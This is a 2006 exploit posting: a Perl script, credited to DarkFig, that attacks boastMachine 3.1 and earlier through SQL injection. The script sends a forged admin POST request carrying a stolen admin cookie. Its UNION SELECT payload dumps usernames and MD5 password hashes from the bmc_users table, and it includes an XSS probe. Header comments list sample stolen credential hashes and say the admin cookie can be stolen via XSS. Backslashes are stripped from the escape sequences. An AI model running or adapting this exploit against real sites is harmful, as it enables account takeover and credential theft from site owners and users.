boastMachine <= 3.1 SQL Injection Exploit

Credit: DarkFig
Risk: Medium
Local: No
Remote: Yes

#!/usr/bin/perl # # VulnScr: boastMachine version 3.1 and prior # Web: # # Date: Sun July 16 10:43 PM 2006 # Credits: DarkFig (gmdarkfig (at) gmail (dot) com [email concealed]) # Vuln: SQL Injection, Cross Site Scripting, Cross Site Request Forgery, Predictable Backup Filename # Advisory: (French) # Required: Admin cookie (user+hash) (You can have it with the XSS) # # +-------------------------------------------+ # | boastMachine <= 3.1 SQL Injection Exploit | # +-------------------------------------------+ # root::95f44e0321ed96ba9d2961a54daab05e # darkfig::547bbdedb2a1df8a1422b58e1eaa2111 # dapowa::0b76dc1c5bb6c0267aa89fcea5f95bb6 # use IO::Socket; print STDERR "+-------------------------------------------+n"; print STDERR "| boastMachine <= 3.1 SQL Injection Exploit |n"; print STDERR "+-------------------------------------------+n"; if(!$ARGV[3]) { print STDERR "| Usage: <host> <path> <admin> <md5hash> ---|n"; print STDERR "+-------------------------------------------+n"; exit(); } my($host,$path,$admin,$hash) = ($ARGV[0], $ARGV[1], $ARGV[2], $ARGV[3]); my $sock = IO::Socket::INET->new( PeerAddr => $host, PeerPort => 80, Proto => 'tcp', ); my $data = "do=search&action=search&blog=1' UNION SELECT user_pass,user_login FROM bmc_users%23&cat_list=<script>alert(666)</script>"; my $leng = length($data); print $sock "POST $path"."bmc/admin.php HTTP/1.1rn"; print $sock "Host: $hostrn"; print $sock "Referer: http://localhost/bmachine/bmc/admin.php?action=search&blog=rn"; print $sock "Cookie: BMC_user=${admin}; BMC_user_password=${hash}rn"; print $sock "Content-Type: application/x-www-form-urlencodedrn"; print $sock "Content-Length: $lengrnn"; print $sock "$datarnn"; while($answ = <$sock>) { if($answ =~ /<option value="(S*)">(S*)</option>/) { if(length($1) eq 32) { print STDERR $2."::".$1."n"; }} if($answ =~ /<option value="title">/) { last; } } $sock->close(); exit();

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